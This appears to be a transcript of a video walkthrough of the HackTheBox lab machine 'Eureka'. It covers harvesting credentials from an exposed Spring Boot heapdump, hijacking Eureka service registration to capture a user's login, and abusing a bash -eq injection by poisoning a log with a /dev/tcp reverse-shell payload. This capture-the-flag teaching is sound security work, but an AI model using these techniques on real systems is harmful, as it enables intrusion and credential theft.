What's going on YouTube? This is Ipsec, and we'll be doing Eureka from HackTheBox, which if you're good at recon, this could be on the easier side of hard. The first tricky part is enumerating the backend framework is Springboot, which helps you find that the actuator endpoints are exposed, namely the heapdump one. It can be tricky to find, but if you run a tool like Nuclei, it will automatically show it without any specialized word list or things like that. In the heapdump, you find credentials. I'll show exploring it several ways, first with strings, then we'll use a tool called VisualVM, which lets us do OQL queries that can view information of the heapdump, and then finally, we'll use a specialized tool called JDumpSpider. Once here, we discover Eureka is running, which is a service discovery system by Netflix. It lets services dynamically find each other, but we can register our own service, and that lets us hijack the /login endpoint, which lets us get credentials of users logging in. With this credential, we gain access to some log files, and there's an analytical script that is running that has a code injection vulnerability once we poison this log file. So with that being said, let's jump in. As always, we're going to start off with an nmap, so -sc for default scripts, as v enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it Eureka, and then the IP address of 10.10.11.66. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and the banner tells us it's an Ubuntu server. We also have HTTP on port 80, its banner tells us it's Nginx, also running on Ubuntu, and it is redirecting all the requests to fernie.htb. So let's go ahead and add this to our host file. So we'll do a sudo v etc host, and then we can do 10.10.11.66. fernie.htb, and this is just going to allow us to view that page, right? So let's go close this. And there's nothing else in this nmap, so I'm going to go over to Firefox, and we can just go http 10.10.11.66. It'll redirect to fernie.htb, which we have in our host file, so it lets us go to the page. Now, the first thing I always like doing is looking at the source code to see if I can figure out how this page is built, right? We have a static images fave icon. I'm just looking for links that may indicate a content management system or blog like WordPress, Drupal, like just random things in the source code that kind of reference that, like maybe a .php, so I know it's a PHP website, but I'm not really seeing anything immediately in the source code. If we go over to Wappalizer, I'm kind of curious if it sees anything. We have Nginx, Bootstrap, Ubuntu, Cloudflare, so it's not really giving us anything, right? We could also look at the headers of the web page to see if it has an X powered by. So curl-I, paste this in, and let's see, Nginx, nothing really here. We don't even get a cookie or anything like that. I bet if we went to the register and created an account and logged in, it would tell us, right? So let's do ipsec root at ipsec.rocks, and then I'll do password 1234, register. I didn't give it a username. Let's try this. Looks like that worked. I'm going to turn Burp Suite on. It is on. Let's go here. This, send the request, and let's see what our cookie looks like. We just have a session. So I was hoping it would be like JSession ID or something like this, but we can't identify the framework based upon that. We can look at the decoded base64, and this is just a UUID, so we can't really get anything from that. My favorite way to identify websites is based upon 404 pages. So if they just have the standard 404 page, it's relatively easy to see. We have this white label error page. This looks very much like a Springboot. If we go to OXDF's blog, he has created a page that highlights all the 404s. So I'm going to go Google OXDF 404, default pages, and then I'm just going to copy this, paste it in, and it shows it as Springboot. So this page looks very identical to the one we have. I'm sure if they had created a mapping for /error, then we wouldn't be able to enumerate the framework this way, right? But it is going to be a Spring Boot web page. And the first thing I like doing always is enumeration. So let's go ahead and set up a GoBuster, right? So I'm going to do a GoBuster directory mode URL HTTP fernie.htb wordlist op seclist. I'm going to change the word list slightly here because normally I use graph small words, But Springboot has its own word list, right? So if I do a find.grep let's do Spring. Here we go. So I'm already in OPSEC list. So let's just go discovery, web content, programming language specific, and then Java Spring Boot. So we can paste this in and we see the actuator is exposed. Also, I am running the latest version of GoBuster. If you're not on the latest one, this last page won't actually tell you what it is. The error message will just be like a context expired. It doesn't say the page, which is actuator heapdump. And this is going to be critical, right? If you didn't want to use this, I know a lot of people have been using like Nuclei lately. It's like a better version of Nicto, I guess I can say. This may be doing a disservice to Nuclei because Nicto doesn't really do that much in today's age. But if I just ran Nuclei against this, so we'll do Nuclei target fernie.hdb, it'll actually highlight that the actuator is exposed. And this creates a lot of vulnerabilities, right? So let's just have this run, and I can go to Google, I guess, google.com. Let's turn Burp Suite off while I search. Let's say actuator exposed security. Maybe this can go. I'm looking for a specific blog post. Not seeing it here. I think it was on Wiz.io. There we go. Actuator Misconfigurations. This is a good blog post that goes into a lot of various things you can do. So I'd highly recommend reading this whole thing. But one of the first things they talk about is the exposed heap dump file. And this just has a lot of sensitive information, including passwords. And it still looks like it is running here. I thought this would go a little bit quicker. There we go. Looks like it has started. But we can now look at the results of GoBuster, and we see the actuator heap dump is here. It just times out because this file is relatively big. So the default timeout, I think, is 10 seconds. Yep, 10 seconds here. So it took more than 10 seconds to hit that page, so that's why we have the error message. But I'm going to do a wget http fernie.htb, and then we can put the actuator heap dump and start that download. And right here, we can see there is a critical already that the heap dump is exposed from Nuclei, right? So this is highlighting all the vulnerabilities. These are just info, but the critical definitely is critical, as we'll see. It is downloading this, so I'm going to pause the video and let this finish, and we'll resume once everything is done. Okay, everything is wrapping up. And looking over at the Nuclei things first, we can see it has a lot of various things. I didn't even know like the composer was leaked. So if we do a curl on this, let's see. Not found. I'm not exactly sure why that is highlighting, because that is a 404. I was expecting to see like the entire page, but some of these, I guess, are incorrect, right? The actuator itself, I don't think I ever discovered it. You can think of it as like a debug endpoint. It's mainly for developers where they can hit these endpoints and identify things that are useful for debugging. Like they can view caching, the features. There's probably other ones that are beneficial. I know like they can view all the threads that are running. So there's just a lot of just various things that the actuator provides that is beneficial, right? Let's see what conditions looks like. So if we just do a curl here, that is a lot of data. We can see a bunch of stuff that isn't really useful to us, I think. But if we're a developer, maybe it is useful. You always should have actuators disabled on, unless you're using them. Definitely on production websites, because you'll see a lot of sensitive data is here, right? The heap dump has been saved, and there's a few ways we can go about looking at this, right? This is going to be the memory of the Java application. We could just go strings it and see a bunch of data. And it is, let's see how big this is, 77 megs. So we probably want to use grep. If we just do like grep password on this, if we type it correctly, we can see a lot of strings with password. Let's see. Let's go over to less and see if we see anything. /change password. Looking down, we may want to add like password equals or something because still is a lot of lines. Let's see. Does anything stick out to my eye? It isn't right now. Let's try password equals. And there we go. We have one. Password is equal to Oscar, passwd, and the user. And this will actually let us SSH into the box. But I want to show other ways we can analyze this heap dump because this is not exactly efficient, right? The most verbose way is using VisualVM. So if we Google VisualVM GitHub, let's go to Google, and this is going to be on Oracle. I know there is another page under the VisualVM, but that will be deprecated. You definitely want to use the Oracle one. And let's go over to releases. And let's see. I want to say we want the zip. I want to say if I download this, we'll be able to get it working. Okay, it is downloading. Let's make dir VisualVM. Go in here. 7-zip, extract the zip. Okay. I didn't need to create the directory. I always am in the habit of creating a directory when I unzip things, just in case it unzips to like the current working directory and like clobbers that entire thing. Now, if I just ran VisualVM right now, it'll work, but I don't want to do that just because the font is going to be small. So I had Googled, or not Googled, but I don't know where my cursor went. There we go. If we went on their page and said like font size, I just typoed that. Let's fix that. Font size. There is an issue that says how to make this bigger, right? Let's see what it wants. We add this configuration parameter, I think. So let's go cd.etc. I think it's visualvm.conf. Is that where I did this? And I want to say we add it to the end of this. And I'm just going to create a new line, comment that out so I have it backed up in case I screw this up. Save that. And now if we go to bin, VisualVM, there's probably also a way to change it into dark mode, but I didn't get to that far to look at it. I'm going to do load. Let's go HTB. Where is this box? Eureka, heap dump. And let's see. So the easiest way is to switch over to the OQL. And this can give us like a SQL-like thing. I bet if we did like Google VisualVM, OQL, heap dump, security sensitive strings, we can probably find a blog post. Yeah, analyzing heap dumps via OQL queries. So this also talks about it. It still talks about the Actuator 2 and other ones, but it gives us things we can look at, right? So we have this select S from Java lang string where S2 string contains JWT. So we can paste that down here, run it, and I don't think it finds anything. Let's see. Oh, there is some, but this is just things. Maybe this is going to be the JWT. I don't know. In my cookie, I didn't see a JWT. It was just a UUID. So I don't think that's going to get too much. If we look at password, let's see. This is going to show us all the strings with password. And here we go. We can see a MySQL, localhost 3306, and Oscar 190 solid password, Oscar 190 here. We could also just search for Oscar, I think. Let's see what happens with this. If we get other things, just that. Let's see. You can search for other strings like PWD. Sometimes that's abbreviated as password. We also get a second password of a Eureka server. There's a lot of things, queries you can do to find things. We'll get this password other ways, so you don't really have to do this as kind of a leap. There's other ways you can just explore this memory in order to find the string, but I'm not that good at Java analysis, so I'll leave that for another day. I just kind of wanted to show this console of being able to search for passwords, right? So let's close this. And I'm going to Google, JDumpSpider. This is another tool that can analyze heap dumps. And this is probably what I would do first, right? Let's go to this repo. It's always a little bit hesitant running something in a different language, but it's got an auto build, so I semi-trust it. So let's just download this JDumpSpider. And of course, I'm in a VM. If I was doing this, I'd probably snapshot, run it, then revert to snapshot just because it's a new tool. I don't have a lot of trust in it, but yeah. So let's go ahead and move downloads JDumpSpider here. We can just do java-jar JDumpSpider heapdump. And there we go. So we have the output of this tool, and it's going to do its best to highlight everything, right? So right now we have the Spring source data properties, password, MySQL, user. So let's go ahead and add some creds, vcreds.text, username, and let's go ahead and grab this password. It's looking at WebLogic configuration, Mongo, AliDruid, Hikari, Redis, Jedis, cookies. This origin tracked property source, this is where it also gives us the Eureka server. So we can grab these credentials as well and paste this here. And this will be handy later. And it is on port 8761. So we could try seeing if we can access this, right? We can go Fernie 8761 and see if we can. It wasn't in our nmap, but we didn't do a full port. We just did top 1000, and 8761 probably isn't one of the top ports, right? So we could do /Eureka, and then it wants credentials. So let's go ahead and give it credentials. We can save this. Cat it, makes it easier to copy. Eureka server. And then Oscar password is the best. And no mapping, huh? I kind of expected something here. There is a second page we can get. I think it's /app. No? Maybe we have to be IP 1166. Let's put this password in. I wonder if it's mapped so this port is open externally, but only accessible from localhost. Huh. Okay. Not exactly sure what's going on there, but we will move on, right? So we have another set of credentials. So I'm going to try Oscar 190 at 10.10.11.66. And let's go ahead and copy this password. And if this doesn't work, then I'd probably try Eureka here, right? And there we go. We get in. Awesome. The first thing I like doing is just a find dot and looking at all the files in my home directory. There is a .config, htop.rc. Don't know exactly what this is for. I was thinking it was like a one-time pad for like a multi-factor login, but it doesn't look like that. I don't know exactly what that goes to. There was also a nano config. So if I do .local share nano search history, we can see an odd netcat. I don't know exactly what that is for. My first thing is going into /opt because that's what I'm used to, like Java applications being installed, right? And there is a heap dump in a scripts. If I try to go into heap dump, I can't. If I try to go into scripts, I can't. I want to look at this log analyze function. So if we cat this, we can go to the top and look at it. It is a bash script, right? So let's see. We have to give it a file and then outputs log analysis. We have status codes here. And right now, I'm just looking for some type of vulnerability here, right? Analyze logins. It's grabbing for the login file. So that's where we paste it. Let's see. Read line, echo line. This is in quotes, so I don't think it's escapable. Everything here looks fine. Looking at this next one, we have an analyze HTTP status. It's looking at lines. We're grepping for HTTP something status colon, and then the log file again. When we don't know what this log file is, but let's see. While we read the line, we're going to get whatever is after status. So this is probably going to be like a code or something like that. Yes, definitely a status code. And then let's see. Right here, we have a traditional like command injection vulnerability. You may not think so, but this has, if we can control code, which it looks like we can if we can write to the log file, you can actually put arithmetic in here that results in code execution, right? I think it's just like a letter, then brackets, then you can do bash code and then end the bracket. Let's see, let's do bash EQ code injection. There's probably gonna be tons of articles about this, right? Looks like there's a script called shell check that will probably look for vulnerabilities in bash scripts. I don't think I've ever seen this. Let's see, source. Does this have a quick way to run? Looks like it does. Let's see. They just do /shell check. Cabal 1MD stable version. I haven't ran this before, but let's try it, actually. I'm curious. So we can copy this link. And then we're going to fail probably trying to untar this because it is a XZ. I don't know how to untar that. XVF? Does this just work? Hey, looks like it does. Awesome. So let's go into shell check. And I'm going to copy this script. And we're just going to see if there's other vulnerabilities in it or if this is actually a vulnerability. I'm really curious if this finds it. And this may be a little bit confusing because we can't exploit this right away, but this is kind of the path I went through when I was solving the box. So I figured I'd show the path I went instead of just showing all the answers, right? So let's do log analyze.sh, paste it in, /shell check, put this, and let's see. This is unused potentially, unnecessary. I don't think it saw the EQs, which is odd. We can show this in a test, right? If I do test.sh, if 1 is equal to, let's do 1 like that, then echo match. I probably have to put that in quotes. I don't know. I don't think so, actually. And then phi, right? So we can chmod plus x test.sh 1. Maybe we have to say bin bash. Is it like this? There we go. So what we want to do is we'll do a, then echo ipset. We'll do please subscribe. Please subscribe. And the single quote. And that did not work. I was really thinking it would be that easy to show. Maybe echo just doesn't work and we should touch a file. Let's do which touch. I always like using absolute paths when I can, just because I never exactly know if the script is going to have my full directory. So let's do dev shm, please subscribe. That seems fine. If we ls this, does not exist, run it, and it does exist. So we have code execution. We just can't see the results, right? Now, the question is, do I have code execution because of the script, or is it because I'm injecting in my bash prompt? Let's delete this real quick because I see what I did. This is in double quotes, right? So it may be processing this before it even sends it to my script. So that's why I want to test. We can easily do that by just doing this. Run that. Dev shm. That file still exists. So that is why that had worked. Let's put this in single quotes. If we do it in single quotes, it should not treat this as a command. So this should be empty. Awesome. Always important to double check your results, right? So now let's put the $1 here. We'll send the same payload and please be there. It is not. So let's look at the script and see where we messed up. Oh, it is a -eq. I think if you do equals, that's going to like treat it as strings. It has to be the arithmetic, which would be -eq. And I bet this is the issue, right? Let's go ahead and run this. And it's there. So that is definitely going to be the issue. I wonder if echo works. Let's do echo. It does not look like it. Echo's in bin. Doesn't look like echo works, but we do definitely have code execution when it is -eq. So I'm going to double check that the log analyze was EQ. Let's go up. Let's see. Display results, analyze log errors. Yes, it is -eq. So awesome. Now what we want to do is, let's see, find out where this is running, right? So if we do ps-ef -forest, do we get lucky and just see it? We don't. So I'm going to get a program called pspy, and then we can see if this script is running at all, right? So if we do pspy GitHub, go here. Let's go over to releases to download it. Go here. I probably should just save this to my machine because it is definitely a handy tool. I think you should always be running it as soon as you get a shell on a HackTheBox machine because it's like all recon. Like, you just lose time if you don't run it because you can't hack time, right? So let's go here, wget download. Let's go dev shm, wget HTTP 10.10.11.14.8, 8000, pspy 64. We did not start the server. Download it. chmod +x. Let's execute and let it download. And what I meant about like you can't hack time is I always like having recon running in the background because when you hit a dead end, you want to go look at the results of your recon, which may take a minute, it may take 30 minutes. You never know how long that process is going to take. Like if you run VisualVM and it does a recursive scan of all the directories, it may take 30 to 60 minutes. So if you're hammering out a web app, you just keep running into a brick wall. You'll eventually want to run that VisualVM, and then you can't get the results for 30 to 60 minutes, whereas if you just ran it in the background, you would have got them. I view pspy kind of like the same thing. Most HackTheBox machines do crons at 1 to 2 minutes, so if something's going on, you'll see it there, but I find if you don't really take the effort to copy pspy to the machine and run it, you'll just be lazy and not want to run it when really just postponing it is what delayed you, right? We have a bunch of things that just popped up. So let's see what we have. I don't see log analyze real quick. So we have this Miranda login simulator. So we probably should be looking at logins. The script, there's something running that is forcing logins to happen periodically. So that is a hint at what the next step actually is. We kind of went on this weird rabbit hole of looking at the log analyze where there is a login simulator where you can potentially get credentials from. But let's just keep going, let this run, probably give it another minute, and then we'll see. And this is another good example of can't hack time, right? If we just let this run, the first thing we saw may have been beneficial. There may be more things to see. And if we just now went around and went on this rabbit hole, we'd never give this pspy program enough time to see the second thing that is running, right? So always just nice to have Recon run in the background, let it run for a while, and then see what you have. So here we go. This is what I wanted to see. We have this var www cloud gateway log application.log. So this is where it is getting that code from, the log analyze function. So let's go ahead and see the permissions on this file. And we see www data has read write. We're Oscar 190. If we do groups, we're not a member of that. Even if we were, the group is only read. So we're not the www data user. We could try to find a way to get to that user. If this was a PHP, I'd look for like writable directories in the web, so I can just write a PHP shell to escalate, but it's not PHP. So let's go ahead and try something else. It's also Nginx. If it was Apache, I'd probably just drop a PHP script and see if the module's installed to let code execution work anyways, but Nginx doesn't by default have an easy way to execute PHP. You normally have to use like a PHP FPM, and then point Nginx at that. So the configuration for getting PHP on Nginx is a little bit more tricky. But if I look at the directory permissions, so if we just go up one directory, look at this directory. Let's see. We can see the developers group owns the directory and has read, write, execute over it. So we weren't a member of the developers group, but if we do git ent group developers, we can see Miranda wises. So if we can get over to Miranda, we can take over this log file, then we can poison it with the HTTP code with that code execution and get code execution. I know I just said code execution twice, but if that doesn't make sense, it'll probably make sense once we exploit it. But this is kind of the path I went down to find out how to get to Miranda, right? So let's go into this var www directory. Let's go to web. And this is going to be all the applications that the Java is running. And I'm just going to do a grep for Miranda. Did I spell that right? Let's cat etsy pass wd grep-r Miranda. And we see Miranda Wise is logging in periodically to the user management service. So what we have to do is find a way to get her credentials, right? We're not logging them anywhere in this log file. But if we looked at what each of these applications are, Eureka is a load balancer. And we have credentials to Eureka. If we Google like hacking Eureka, this blog post I think is good. I think it's this one. But essentially, since it's a load balancer and we have credentials, we can add our endpoint to the Eureka server. So when people try to log in, like 50% of the time, it goes to our server. And then we get their credentials that way because the load balancer is just sending them to us, right? It's on a round robin thing. So sometimes it sends it to the actual application. Sometimes it sends it over to us. They're going to give a big curl script, I think, to do it. If you go to /flag, let's see, do they give it? What if an attacker? Yeah, they're sending this big post request. So they're manually sending a post request to Eureka in order to add a host to it. But I don't like doing that. I'm just going to create a quick Python script in order to join the Eureka cluster, right? So you can do it this way with a curl, but I think the cooler way is to use a scripting language and just join the cluster. First, we want to do a curl-u. Let's get the creds. So let's see. Eureka. Was that the actual cred? SRVR? I'm used to just saying SRV. Okay. Maybe I typoed that, but I don't think so. That's a hard typo to make. Let's copy this. And then HTTP 10.10.11.66 Eureka apps. That goes to a moved permanently. I don't think, wait, we need 8761. 8761. Okay, that is giving me. I don't know what my web browser was doing, but I'm almost positive we checked this, right? But this is going to be the configuration. And we have this user management service here. And this is going to be where /login most likely is because it's the user management service. So what we want to do is create a Python application to join the user management service pool. So to do that, I'm just going to go to ChatGPT and ask, can you give me a Python script to join a Eureka load balancing pool called user management service? Let's see. You don't join instead server. Okay. It's telling me I'm slightly wrong in my terminology, but that's fine. And this isn't the type of script I was expecting, because there is an actual Python library. Is there a Eureka client Python library? Because this is essentially doing the same thing I didn't want to do, is just use curl to send a request, right? There we go. The Eureka client. This is more what I wanted. Let's see. Can you give me a full script that does this with Flask? This seems to be good. I want the /login endpoint. So hopefully this works easily. It's always hard to include AI stuff in videos because I never get the same thing every time, right? But we'll play with this and debug it. It shouldn't take too long. Let's do make dir Eureka. We're going in twice. Oh, well. Let's see. We want to do a Python 3-m VM source VM bin activate. And we're going to do a pip3 install. Or let's do the script app.py paste pip3 install py Eureka. That's just probably, what is it? Okay, that looks like it worked. V app.py. Let's see, we want 10, 10, 11, 61. Log in. And here, we're not going to validate any credentials. No matter what, we're going to say invalid credentials. And we'll just print data. Okay, Python 3 app.py. pip3 install Flask. Run it. All Eureka servers are down because we never put our credentials in. Let's see. I wonder if we can just put the username and password here. Let's try Eureka server. And what was the credential? Is it like that? I think so. Eureka server is down. Let's just make sure I have the correct credential here. Let's see. It's 66, not 61. There we go. So now we're no longer getting an error message. That is good. Is this where I did my curl though? Let's copy this so I can put it in the bottom pane. So now let's look at this. So we're going to go to 10, 10, 14. 10, 10. 1166. Doesn't look like I added myself. Grep 10, 10, 14. No. So we screwed something up here. Let's see. So we have the Eureka server. That looks fine. App name, app port. Where do we init? Here we go. So we have the Eureka server, the app name, the instance port. We need to give it the IP address. Let's see. I want Eureka to send login to me. Let's see. Client, is it going to give me? So I'm just going to add, I think it's instance IP is equal to, let's do 10, 10, 14, 8. And there's also like instance host, 10, 10, 14, 8. And let's see, we got instance port, instance IP, instance host. And I'm going to give it the metadata. And I got this from AI when I was solving it. I don't know if I need all these, but these are the fields I think I need. So this is going to tell it to get the IP, and the VIP address, that's going to be the user management service. So let's save this and then rerun. Maybe it's easier if you just use the example in the blog. Let's see, it's still... Oh, there we go. We got post to logins, but we're not printing any data. Let's see, where's that login? Data request. Oh, we're doing get JSON. Let's do get data. Run this. Ten, 10, 14. There we go. So we can see the instance 10, 10, 14, 8 user management service. And now we're a part of the Eureka cluster. So it will send some requests to the user management service back to us. So now we just want to wait. And I'm going to give it, let's give it 2 minutes, right? So to sleep 120, and we'll see if we get any hits. And it hasn't even been a minute yet, and we get 2 hits. We get, two. We have Miranda Wise at phony.htb, and the password is probably, I'd love to, there's a bunch of URL encoding. So let's just copy this over to Burp Suite's decoder, paste it in, smart decode, I live to be loved. And let's see if we can switch to that user now. But first, v cd.dot, v creds.text, Miranda Wise, like that. SU, Miranda Wise, paste it in, and there we go. We're now Miranda, and we're a member of developers. Now, if you remember, we looked at this log analyze, and there was code injection in the HTTP statuses because we have this equals. And now we can poison this log file. So what we want to do is let's go to var www web. Then we can go into, I think it was Cloud Gateways logs, right? Log. And we can't edit this file directly. So if we do echo 1 to application log, we get permission denied. But we should be able to, can we just ch own it? Miranda Wise application log. Operation not permitted because we don't have ownership over that file. but we can just delete the file, or we could probably move it, right? If we move it like this, there we go. And we can do that because we own the directory, right? Linux is just letting us do it because anyways, we could just like rename the /log directory and then create a new one and then create the file. So that's why we can do this. Let's do echo. And what we need to have is it needs to start with what? HTTP status, then colon. And then we can put our code execution. So we can do like this, bin bash -c. Let's see. I'm going to see if we can do it without the -c, because if we do -c, we need to have another single quote, and that's going to make it a little bit more challenging. But maybe we'll just do bin bash -i. Let's see. Hold on. Bash -c. Bin bash -i. Dev TCP 10.10.14.8 9001 0 and 1 like that. Okay. Don't mind me. I actually had to type the bash -c so my muscle memory kicked in. I could remember all the flags. I was just drawing a blank at like what came after -i, but my mind works weird. If I just type the full thing, it just auto completes in my head. So that looks good, right? Okay. So I'm going to write this to application.log. And let's close this. nclvnp 9001. Let's move this again. Yes. Now I can write it. Awesome. And I guess what we can do while we wait, if we go opt log analyze.sh, it's doing a grep, right? We want to make sure we match that. What is it? This grep status K. And we have to put HTTP because it's doing a grep here. So it's catting the log file. Well, it's grepping the log file for HTTP status. So we have to have HTTP in it. Let's go here. Cat application log. Like this. There we go. So it's expecting to see a code here, like 200. And we're giving this. And hopefully this is enough to get code execution. We'll see. I'm going to give it a minute and pause the video, and we'll come back when this is done. And it hasn't even been a minute yet, and we get the root shell on Eureka where we can cat root.txt. So hopefully you guys enjoyed that. Take care, and I'll see you all next time.